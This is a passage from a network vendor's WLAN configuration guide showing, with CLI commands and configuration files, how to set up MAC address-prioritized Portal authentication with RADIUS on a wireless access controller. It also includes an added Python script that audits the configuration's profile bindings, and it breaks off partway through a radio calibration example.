– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 16-17 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
l V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
l V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D
l V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
To meet service requirements, the company needs to deploy an identity authentication system that
controls access for everyone who attempts to connect to the company network, so that only
authorized users can connect.
Because visitors move frequently, Portal authentication is configured and the RADIUS server
is used to authenticate user identities.
To make network access easier, the company decides to configure MAC address-prioritized
Portal authentication. If a user goes offline after passing Portal authentication for the first
time, the user can go online again within a certain period (60 minutes, for example) without
entering the user name and password again.

Figure 16-7 Networking for MAC address-prioritized portal authentication

[Figure: STAs in the guest area associate with the AP, which connects to SwitchA GE0/0/1; SwitchA GE0/0/2 connects to AC GE1/0/1 (management VLAN 100, VLANIF100 192.168.1.1/24). AC GE1/0/2 (service VLAN 101, VLANIF101 192.168.2.1/24) connects to the intranet, which hosts the RADIUS Server/Portal Server 192.168.2.30 and the DNS Server 192.168.3.1.]

Data Plan

Table 16-18 Data plan

DHCP server: The AC functions as a DHCP server to assign IP addresses to the AP and STAs.
IP address pool for APs: 192.168.1.2 to 192.168.1.254/24
IP address pool for STAs: 192.168.2.2 to 192.168.2.254/24
IP address of the AC's source interface: VLANIF100: 192.168.1.1/24
RADIUS authentication parameters:
l Name of the RADIUS authentication scheme: abc
l Name of the RADIUS server template: rd1
l IP address: 192.168.2.30
l Authentication port number: 1812
l Shared key: Huawei@123
l AAA domain: huawei.com
Portal server template:
l Name: abc
l IP address: 192.168.2.30
l Destination port number in the packets that the AC sends to the Portal server: 50200
l Portal shared key: Huawei@123
Portal access profile:
l Name: web1
l Bound template: Portal server template abc
MAC access profile:
l Name: m1
l User name and password for MAC address authentication: MAC addresses without hyphens (-)
Authentication-free rule template:
l Name: default_free_rule
l Authentication-free resource: DNS server with IP address 192.168.3.1
Authentication profile:
l Name: p1
l Referenced profiles: Portal access profile web1 and MAC access profile m1
l Forcible authentication domain for users: huawei.com
AP group:
l Name: ap-group1
l Referenced profiles: VAP profile wlan-vap and regulatory domain profile domain1
Regulatory domain profile:
l Name: domain1
l Country code: CN
SSID profile:
l Name: wlan-ssid
l SSID name: wlan-net
Security profile:
l Name: wlan-security
l Security policy: open system authentication
VAP profile:
l Name: wlan-vap
l Forwarding mode: tunnel forwarding
l Service VLAN: VLAN 101
l Referenced profiles: SSID profile wlan-ssid, security profile wlan-security, and authentication profile p1

Configuration Roadmap
1. Configure basic WLAN services so that the AC can communicate with upstream and
downstream network devices and the AP can go online.
2. Configure WLAN service parameters for STAs to access the WLAN.
3. Configure AAA on the AC to implement identity authentication on access users through
the RADIUS server. The configuration includes configuring a RADIUS server template,
an AAA scheme, and an authentication domain, and binding the RADIUS server
template and AAA scheme to the authentication domain.
4. Configure MAC address-prioritized Portal authentication. The configuration includes
configuring a Portal server template, a Portal access profile, a MAC access profile, an
authentication-free rule profile, and an authentication profile, and binding the
authentication profile to an interface.
5. Configure WLAN service parameters, and bind a security policy profile and an
authentication profile to a VAP profile to control access from STAs.
6. Configure the Agile Controller.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can exchange CAPWAP packets.
# On SwitchA, add GE0/0/1 connected to the AP and GE0/0/2 connected to the AC to
management VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit

# Add GE1/0/1 of the AC connected to SwitchA to VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 101
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with upper-layer network devices.


NOTE

Configure AC's upstream interfaces to transparently transmit service VLAN packets and communicate
with upstream network devices.

# Add GE1/0/2 of the AC connected to an upper-layer device to VLAN 101 (service VLAN).
[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AC as a DHCP server to assign IP addresses to the AP and STAs.

# Configure the AC as the DHCP server to allocate an IP address to the AP from the IP
address pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.1.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.2.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 4 Configure the AP to go online.

# Create an AP group to which the APs with the same configuration can be added.
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import the AP offline on the AC and add the AP to AP group ap-group1. In this example,
the AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's
deployment location, so that you can know where the AP is located. For example, if the AP
with MAC address 60de-4476-e360 is deployed in area 1, name the AP area_1.

NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 and radio 1. Radio 0 of the
AP6010DN-AGN works on the 2.4 GHz frequency band and radio 1 works on the 5 GHz frequency band.

[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit
[AC-wlan-view] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field displays nor, the AP has gone online.
[AC] display ap all
Total AP information:
nor : normal [1]
------------------------------------------------------------------------------------
ID  MAC             Name    Group      IP             Type          State  STA  Uptime
------------------------------------------------------------------------------------
0   60de-4476-e360  area_1  ap-group1  192.168.1.254  AP6010DN-AGN  nor    0    10S
------------------------------------------------------------------------------------
Total: 1

Step 5 Configure AAA.

# Create and configure the RADIUS server template rd1.


[AC] radius-server template rd1
[AC-radius-rd1] radius-server authentication 192.168.2.30 1812
[AC-radius-rd1] radius-server shared-key cipher Huawei@123
[AC-radius-rd1] quit

# Create the AAA authentication scheme abc and set the authentication mode to RADIUS.
[AC] aaa
[AC-aaa] authentication-scheme abc
[AC-aaa-authen-abc] authentication-mode radius
[AC-aaa-authen-abc] quit

# Create the authentication domain huawei.com, and bind the AAA authentication scheme
abc and RADIUS server template rd1 to the domain.
[AC-aaa] domain huawei.com
[AC-aaa-domain-huawei.com] authentication-scheme abc
[AC-aaa-domain-huawei.com] radius-server rd1
[AC-aaa-domain-huawei.com] quit
[AC-aaa] quit

# Check whether a user can pass RADIUS authentication. (The test user test and password
Huawei2012 have been configured on the RADIUS server.)
[AC] test-aaa test Huawei2012 radius-template rd1
Info: Account test succeed.

Step 6 Configure MAC address-prioritized Portal authentication.


# Configure the Portal server template abc.
[AC] web-auth-server abc
[AC-web-auth-server-abc] server-ip 192.168.2.30
[AC-web-auth-server-abc] port 50200
[AC-web-auth-server-abc] url http://192.168.2.30:8080/webagent
[AC-web-auth-server-abc] shared-key cipher Huawei@123
[AC-web-auth-server-abc] quit

# Configure the Portal access profile web1.


[AC] portal-access-profile name web1
[AC-portal-access-profile-web1] web-auth-server abc direct
[AC-portal-access-profile-web1] quit

# Configure the MAC access profile m1.


NOTE

In a MAC access profile, a MAC address without hyphens (-) is used as the user name and password for
MAC address authentication.
[AC] mac-access-profile name m1
[AC-mac-access-profile-m1] quit

# Configure the authentication-free rule profile default_free_rule.


[AC] free-rule-template name default_free_rule
[AC-free-rule-default_free_rule] free-rule 1 destination ip 192.168.3.1 mask 32
[AC-free-rule-default_free_rule] quit

# Configure the authentication profile p1, bind the Portal access profile web1, MAC access
profile m1, and authentication-free rule profile default_free_rule to the authentication
profile, specify the domain huawei.com as the forcible authentication domain in the
authentication profile, set the user access mode to multi-authen, and set the maximum
number of access users to 100.
[AC] authentication-profile name p1
[AC-authen-profile-p1] portal-access-profile web1
[AC-authen-profile-p1] mac-access-profile m1
[AC-authen-profile-p1] free-rule-template default_free_rule
[AC-authen-profile-p1] access-domain huawei.com force
[AC-authen-profile-p1] authentication mode multi-authen max-user 100
[AC-authen-profile-p1] quit

Step 7 Configure WLAN service parameters.


# Create the security profile wlan-security and set a security policy in the profile. By default,
the security policy is open system authentication in open mode.
[AC] wlan
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] quit

# Create the SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create the VAP profile wlan-vap, configure the data forwarding mode and service VLANs,
and bind the security profile, authentication profile, and SSID profile to the VAP profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security


[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] authentication-profile p1
[AC-wlan-vap-prof-wlan-vap] quit

# Bind the VAP profiles to the AP group and apply the VAP profiles to radio 0 and radio 1 of
the APs.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

Step 8 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 9 Configure the Agile Controller.

For details on how to log in to the Agile Controller, add user accounts and switches to the
Agile Controller, and configure authorization results and authorization rules on the Agile
Controller, see 10.6.1 Example for Configuring Portal Authentication to Control Internal
User Access to the Enterprise Network (Authentication Point on Core Switch). The
configurations are not described here.

In addition to the preceding configurations, you need to enable MAC address-prioritized
Portal authentication on the Agile Controller. The procedure is as follows:
1. Choose System > Terminal Configuration > Global Parameters.
2. On the MAC Address-Prioritized Portal Authentication tab page, enable MAC
Address-Prioritized Portal Authentication, and set Validity Period of MAC Address
to 60.

3. Click OK.

Step 10 Verify the configuration.


Item: User authentication
Expected result:
• A user can only access the Agile Controller server and DNS server before successful authentication.
• The user authentication page is pushed to the user when the user attempts to visit an Internet website. After the user enters the correct user name and password, the requested web page is displayed.
• After the authentication succeeds, run the display access-user command on the AC to view information about online users.

Item: A user disconnects from the wireless network and reconnects to the network 5 minutes later.
Expected result: The authentication is completed automatically. The user connects to the Internet directly without entering the user name and password.

Item: A user disconnects from the wireless network and reconnects to the network 65 minutes later.
Expected result: The user authentication page is pushed to the user when the user attempts to visit an Internet website. After the user enters the correct user name and password, the requested web page is displayed.

----End

Configuration Files
• SwitchA configuration file
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

• AC configuration file
#
sysname AC
#
vlan batch 100 101
#
authentication-profile name p1
mac-access-profile m1
portal-access-profile web1
free-rule-template default_free_rule
authentication mode multi-authen max-user 100
access-domain huawei.com force
#
radius-server template rd1
radius-server shared-key cipher %^%#4*SO-2u,Q.\1C~%[eiB77N/^2wME;6t%6U@qAJ9:%^%#
radius-server authentication 192.168.2.30 1812 weight 80
#
free-rule-template name default_free_rule
free-rule 1 destination ip 192.168.3.1 mask 255.255.255.255
#
web-auth-server abc
server-ip 192.168.2.30
port 50200
shared-key cipher %^%#CR@WPM9Q30%]A}9]g4hUqe1u~4Fz}PlU)QPL;73#%^%#
url http://192.168.2.30:8080/webagent
#
portal-access-profile name web1
web-auth-server abc direct
#
aaa
authentication-scheme abc
authentication-mode radius
domain huawei.com
authentication-scheme abc
radius-server rd1
#
interface Vlanif100
ip address 192.168.1.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 192.168.2.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
wlan
security-profile name wlan-security
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
authentication-profile p1
regulatory-domain-profile name domain1
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
vap-profile wlan-vap wlan 1
radio 1
vap-profile wlan-vap wlan 1
ap-id 0 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235554710CB000042
ap-name area_1
ap-group ap-group1
#
mac-access-profile name m1
#
return
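The following Python script is an added example; it is not part of Huawei's documentation or of the AC software. It parses a configuration file in the layout printed above (top-level blocks separated by lines containing only #, profiles introduced by a "<kind> name <name>" header or by "web-auth-server <name>") and audits the binding chain that Steps 6 and 7 build: every profile referenced by the VAP profile, the authentication profile and the Portal access profile must be defined, each authentication-free rule should permit a single host, and a security profile that relies on the default open-system policy is reported so that you can confirm it is intentional. The sample configuration is a constructed, shortened copy of the AC file above with the cipher strings replaced by placeholders; the function names and the finding texts are this example's own.

```python
import re

# Constructed sample in the layout of the AC configuration file above (not taken from a
# device); cipher strings are placeholders.
SAMPLE_CONFIG = """\
#
authentication-profile name p1
 mac-access-profile m1
 portal-access-profile web1
 free-rule-template default_free_rule
 authentication mode multi-authen max-user 100
 access-domain huawei.com force
#
free-rule-template name default_free_rule
 free-rule 1 destination ip 192.168.3.1 mask 255.255.255.255
#
web-auth-server abc
 server-ip 192.168.2.30
 port 50200
 shared-key cipher <cipher-placeholder>
 url http://192.168.2.30:8080/webagent
#
portal-access-profile name web1
 web-auth-server abc direct
#
wlan
 security-profile name wlan-security
 ssid-profile name wlan-ssid
  ssid wlan-net
 vap-profile name wlan-vap
  forward-mode tunnel
  service-vlan vlan-id 101
  ssid-profile wlan-ssid
  security-profile wlan-security
  authentication-profile p1
#
mac-access-profile name m1
#
return
"""

# A profile definition header, e.g. "vap-profile name wlan-vap".
DEF_RE = re.compile(r"^(?P<kind>[\w-]+) name (?P<name>\S+)$")
# The Portal server template has no "name" keyword: "web-auth-server abc".
WEB_AUTH_RE = re.compile(r"^web-auth-server (?P<name>\S+)$")

# Reference keywords inside a profile; a reference "<keyword> <name>" must resolve to a
# definition of kind <keyword>.
REFERENCES = {
    "vap-profile": {"authentication-profile", "security-profile", "ssid-profile"},
    "authentication-profile": {"portal-access-profile", "mac-access-profile", "free-rule-template"},
    "portal-access-profile": {"web-auth-server"},
}


def parse_vrp_config(text):
    """Map (kind, name) -> body lines for every named profile.

    Indentation is deliberately ignored (the file as printed above has lost it); a
    definition is recognised by its header pattern and ends at the next header or '#'.
    """
    defs = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in ("#", "return"):
            current = None
            continue
        m = DEF_RE.match(line)
        if m:
            current = (m["kind"], m["name"])
            defs[current] = []
            continue
        m = WEB_AUTH_RE.match(line)
        if m:
            current = ("web-auth-server", m["name"])
            defs[current] = []
            continue
        if current is not None:
            defs[current].append(line)
    return defs


def audit_wlan_auth(defs):
    """Return finding strings; an empty list means the binding chain is complete and tight."""
    findings = []
    for (kind, name), body in defs.items():
        for line in body:
            words = line.split()
            if len(words) >= 2 and words[0] in REFERENCES.get(kind, ()) \
                    and (words[0], words[1]) not in defs:
                findings.append(f"{kind} {name} references undefined {words[0]} {words[1]}")
        if kind == "vap-profile" and not any(l.startswith("authentication-profile ") for l in body):
            findings.append(f"vap-profile {name} binds no authentication-profile")
        if kind == "security-profile" and not any(l.startswith("security ") for l in body):
            findings.append(f"security-profile {name} uses the default open-system policy "
                            "(no 'security' line)")
        if kind == "free-rule-template":
            for line in body:
                words = line.split()
                if words[:1] == ["free-rule"] and "mask" in words:
                    mask = words[words.index("mask") + 1]
                    if mask not in ("32", "255.255.255.255"):
                        findings.append(f"free-rule-template {name}: rule {words[1]} opens more "
                                        f"than one host before authentication (mask {mask})")
    return findings


if __name__ == "__main__":
    for finding in audit_wlan_auth(parse_vrp_config(SAMPLE_CONFIG)) or ["no findings"]:
        print(finding)
```

Run against the sample, the audit reports exactly one finding, the open-system security profile. That is expected in this example, because Portal and MAC authentication are applied through the authentication profile rather than through the security profile; removing the authentication-profile line from the VAP profile, widening the free rule's mask, or deleting a referenced profile each adds a finding.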


16.9 Configuring Radio Calibration

16.9.1 Example for Configuring Radio Calibration
Radio Calibration Overview
Radio calibration dynamically adjusts the channels and transmit power of the APs managed by the same
AC so that the APs work at optimal performance. On a WLAN, the operating status of APs is
affected by the radio environment. For example, if adjacent APs managed by the same AC work on
overlapping channels, or an AP transmits at excessive power, signal interference occurs. In
this case, you can configure radio calibration on the AC.
Typical application scenarios of radio calibration are as follows:
• During AP deployment, configure radio calibration so that APs automatically select the
optimal channels.
• When new APs are added to a network or the network environment changes, configure
radio calibration so that APs adjust their channels and power at a scheduled time and work at
optimal performance.

Configuration Notes
• In this example, the security policy is WPA2-PSK-AES. To ensure network security,
choose an appropriate security policy according to your network configurations.
• In the service data forwarding mode, the management VLAN and service VLAN cannot
be the same. If you set the forwarding mode to direct forwarding, you are not advised to
configure the management VLAN and service VLAN to be the same.
• If direct forwarding is used, configure port isolation on the interface that directly connects to
the APs. If port isolation is not configured, a large number of broadcast packets will be transmitted in the
VLANs, or WLAN users on different APs will be able to communicate directly at Layer 2.
• Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and the
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between the APs and the upper-layer network is added to the service VLAN.
• When configuring radio calibration, set the channel mode and power mode of each AP that
requires radio calibration to auto.
• No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce the impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
• The following table lists applicable products and versions.

Table 16-19 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN


Networking Requirements
As shown in Figure 16-8, a large number of APs are deployed in an office building. The APs
connect to the AC through Switch_A to provide wireless services for users.
Manually configuring radio parameters (such as the channel) for the APs one by one would be
a heavy workload. The enterprise IT department therefore requires that the AC automatically allocate
channels to the APs based on the radio environment, to simplify network deployment.

Figure 16-8 Networking diagram for configuring radio calibration

(Figure not reproduced. Labels recoverable from the diagram: AP1, AP2, and AP3, each serving STAs, connect to SwitchA GE0/0/1, GE0/0/2, and GE0/0/3 in VLAN 100; SwitchA GE0/0/4 connects to AC GE1/0/1 in VLAN 100; AC GE1/0/4 connects to the Internet in VLAN 101. Management VLAN: VLAN 100. Service VLAN: VLAN 101.)

Configuration Roadmap

Table 16-20 Data required for completing the configuration

Item: DHCP server
Data: The AC functions as the DHCP server to assign IP addresses to the APs and STAs.

Item: IP address pool for the APs
Data: 10.23.100.2-10.23.100.254/24

Item: IP address pool for the STAs
Data: 10.23.101.2-10.23.101.254/24

Item: IP address of the AC's source interface
Data: VLANIF 100: 10.23.100.1/24

Item: AP group
Data:
• Name: ap-group1
• Referenced profiles: VAP profile wlan-vap, regulatory domain profile domain1, 5G radio profile radio5g, and 2G radio profile radio2g

Item: Regulatory domain profile
Data:
• Name: domain1
• Country code: CN

Item: SSID profile
Data:
• Name: wlan-ssid
• SSID name: wlan-net

Item: Security profile
Data:
• Name: wlan-security
• Security policy: WPA2+PSK+AES
• Password: a1234567

Item: VAP profile
Data:
• Name: wlan-vap
• Forwarding mode: tunnel forwarding
• Service VLAN: VLANs in the VLAN pool
• Referenced profiles: SSID profile wlan-ssid and security profile wlan-security

Item: 5G radio profile
Data:
• Name: radio5g
• Referenced profiles: RRM profile wlan-net and air scan profile wlan-airscan

Item: 2G radio profile
Data:
• Name: radio2g
• Referenced profiles: RRM profile wlan-net and air scan profile wlan-airscan

Item: RRM profile
Data: Name: wlan-net

Item: Air scan profile
Data:
• Name: wlan-airscan
• Air scan channel set: all channels supported by the corresponding country code of an AP
• Air scan interval: 80000 ms
• Air scan duration: 80 ms

The configuration roadmap is as follows:


1. Configure the APs, AC, and upper-layer devices to communicate with each other.
2. Configure the AC as a DHCP server to assign IP addresses to the APs and STAs.
3. Configure a VLAN pool for service VLANs.
4. Configure the APs to go online.
a. Create an AP group and add APs that require the same configuration to the group
for unified configuration.
b. Configure AC system parameters, including the country code and source interface
used by the AC to communicate with the APs.
c. Configure the AP authentication mode and import the APs offline to allow the APs
to go online.
5. Configure WLAN service parameters for STAs to access the WLAN.
6. Configure radio calibration so that the AC can automatically allocate the optimal
working channels to the APs.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.
# Add GE0/0/1 to GE0/0/3 on SwitchA to VLAN 100 (management VLAN).
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-GigabitEthernet0/0/3] port link-type trunk
[SwitchA-GigabitEthernet0/0/3] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 101
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


NOTE

Configure AC uplink interfaces to transparently transmit packets of service VLANs as required and
communicate with the upstream device.

# Add AC uplink interface GE1/0/2 to service VLAN 101.


[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AP to go online.


# Create an AP group and add the AP to the AP group.
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
